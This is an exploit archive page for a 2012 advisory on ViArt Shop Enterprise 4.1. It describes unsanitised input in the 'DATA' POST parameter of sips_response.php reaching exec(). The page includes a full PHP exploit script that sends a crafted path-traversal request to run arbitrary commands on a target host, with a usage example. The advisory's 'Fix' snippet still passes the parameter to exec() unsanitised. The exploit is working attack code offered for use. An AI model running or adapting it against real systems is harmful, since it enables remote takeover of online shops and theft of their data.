exploit the possibilities

ViArt Shop Enterprise 4.1 Arbitrary Command Executio

ViArt Shop Enterprise 4.1 Arbitrary Command Executio
Posted Sep 26, 2012
Authored by LiquidWorm | Site zeroscience.mk

ViArt Shop Enterprise version 4.1 suffers from an arbitrary command execution vulnerability.

tags | exploit, arbitrary
MD5 | 7eb42e20ae5ab7916441ede29a6a3374

ViArt Shop Enterprise 4.1 Arbitrary Command Executio

Change Mirror Download
<?php

/*

ViArt Shop Enterprise 4.1 Arbitrary Command Execution Vulnerability


Vendor: ViArt Software
Product web page: http://www.viart.com
Affected version: 4.1, 4.0.8, 4.0.5

Summary: Viart Shop is a PHP based e-commerce suite, aiming to provide
everything you need to run a successful on-line business.

Desc: Input passed to the 'DATA' POST parameter in 'sips_response.php'
is not properly sanitised before being used to process product payment
data. This can be exploited to execute arbitrary commands via specially
crafted requests.

Condition: register_globals=On

=======================================================================
Vuln:
-----
/payments/sips_response.php:
----------------------------

16: if (isset($_POST['DATA'])) {
17:
18: $params = " message=" . $_POST['DATA'];
19: $params .= " pathfile=" . $payment_params['pathfile'];
20: exec($payment_params['path_bin_resp'] . $params, $result);

-----------------------------------------------------------------------
Fix:
----
/payments/sips_response.php:
----------------------------

5: if (!defined("VA_PRODUCT")) {
6: header ("Location: ../index.php");
7: exit;
8: }
9:
10: if (isset($_POST['DATA'])) {
11:
12: $params = " message=" . $_POST['DATA'];
13: $params .= " pathfile=" . $payment_params['pathfile'];
14: exec($payment_params['path_bin_resp'] . $params, $result);

=======================================================================


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.4
MySQL 5.5.25a



Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk


Vendor status:

[09.09.2012] Vulnerability discovered.
[24.09.2012] Contact with the vendor.
[24.09.2012] Vendor responds asking more details.
[24.09.2012] Sent detailed information to the vendor.
[25.09.2012] Vendor confirms the vulnerability, issuing patch (http://www.viart.com/downloads/sips_response.zip).
[25.09.2012] Coordinated public security advisory released.


Advisory ID: ZSL-2012-5109
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5109.php

Vendor: http://www.viart.com/downloads/viart_shop-4.1.zip


09.09.2012

*/


error_reporting(0);

print "\n-----------------------------------------------------------";
print "\n\n ViArt Shop Enterprise 4.1 Remote Command Execution\n\n";
print "\t\tID: ZSL-2012-5109\n\n";
print "-----------------------------------------------------------\n";

if ($argc < 2)
{
print "\n\n\x20[*] Usage: php $argv[0] <host> <cmd>\n\n";
print "\x20[*] Example: php $argv[0] localhost windows%2Fsystem32%2Fcalc.exe\n\n";
die();
}

$host = $argv[1];
$cmd = $argv[2];
$sock = fsockopen($host,80);

$post = "DATA=..%2F..%2F..%2F..%2F..%2F{$cmd}";
$duz = strlen($post);

$data = "POST http://{$host}/payments/sips_response.php HTTP/1.1\r\n".
"Host: {$host}\r\n".
"User-Agent: Mozilla/5.0\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip,deflate\r\n".
"Content-Length: {$duz}\r\n\r\n{$post}\r\n\r\n";

fputs($sock,$data);
while(!feof($sock))
{
$html .= fgets($sock);
}
fclose($sock);
echo "\n" . $html;

?>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close